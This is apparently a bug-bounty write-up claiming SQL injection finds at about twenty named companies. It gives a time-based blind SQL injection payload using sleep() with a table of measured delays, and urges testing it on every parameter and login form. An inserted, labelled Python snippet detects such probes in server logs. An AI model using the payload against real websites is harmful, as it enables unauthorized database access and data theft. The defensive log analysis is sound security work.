How I Found SQL Injection on 8x8, Cengage, Comodo, Automattic, 20 Companies

How I Found SQL Injection on 8x8, Cengage, Comodo, Automattic, Intel, IBM, MTN Group, uis.cam.ac.uk, volvocars.biz, asus.com

What is SQL injection (SQLi)?

I will show you my method to find SQL injection in one photo. I hacked all these companies in this way and reported it on HackerOne and by email to the company.
It's easy to find SQL injection on a website; we just need Burp to test the website. Now see these photos.

What is this command? Why do we use it?

If you add sleep(12), the response takes 12 seconds to come back, and if you add sleep(20), the browser and Burp show you the response and the page after 20 seconds.

  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z => 12.508
  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z => 12.543
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.523
  • 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.565
  • 0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.518
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.502
  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z => 12.491
  • 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.508
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.695

I use this schedule to find SQL injection, and I hacked 20 companies with this method.

Another way to find SQL injection: put this command in all parameters and login forms.
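Seen from the defender's side, the same timing table is a detection signal: a request that carries sleep(N) and takes about N seconds means the database ran the injected call, while a fast response means the probe was only attempted. The following is an added example, not part of the original post; the log format (an `rt=` request-time field), the sample lines, the 2-second slack and all function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (not from the original post). Assumed format:
# client "METHOD target PROTO" status rt=<seconds>, e.g. nginx with $request_time.
SAMPLE_LOG = """\
203.0.113.7 "GET /item?id=0%22XOR(if(now()=sysdate(),sleep(12),0))XOR%22Z HTTP/1.1" 200 rt=12.508
203.0.113.7 "GET /item?id=0%22XOR(if(now()=sysdate(),sleep(0),0))XOR%22Z HTTP/1.1" 200 rt=0.523
203.0.113.7 "GET /item?id=0%22XOR(if(now()=sysdate(),sleep(6),0))XOR%22Z HTTP/1.1" 200 rt=6.565
198.51.100.9 "GET /search?q=0%22XOR(if(now()=sysdate(),sleep(12),0))XOR%22Z HTTP/1.1" 200 rt=0.131
198.51.100.4 "GET /item?id=42 HTTP/1.1" 200 rt=0.480
"""

LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) rt=([\d.]+)$')
SLEEP_RE = re.compile(r'sleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)', re.IGNORECASE)


def classify(line, slack=2.0):
    """Return (path, verdict) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    _client, _method, target, _status, rt = m.groups()
    path = target.split("?", 1)[0]
    # Decode first: the quote and spaces arrive percent-encoded in the log.
    hit = SLEEP_RE.search(unquote_plus(target))
    if not hit:
        return path, "clean"
    asked, took = float(hit.group(1)), float(rt)
    # The delay only appears when the database actually ran the injected sleep().
    if asked > 0 and asked <= took <= asked + slack:
        return path, "executed"
    return path, "attempted"


def vulnerable_paths(log_text):
    """Paths where at least one probe's delay matched the requested sleep."""
    results = filter(None, (classify(l) for l in log_text.splitlines()))
    return sorted({path for path, verdict in results if verdict == "executed"})


if __name__ == "__main__":
    print(vulnerable_paths(SAMPLE_LOG))
```

An "executed" verdict marks an endpoint whose query must move to parameterized statements; an "attempted" verdict is scanning noise worth rate-limiting but not proof of a flaw.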

I’m here

https://hackerone.com/lu3ky-13

https://twitter.com/lu3ky13
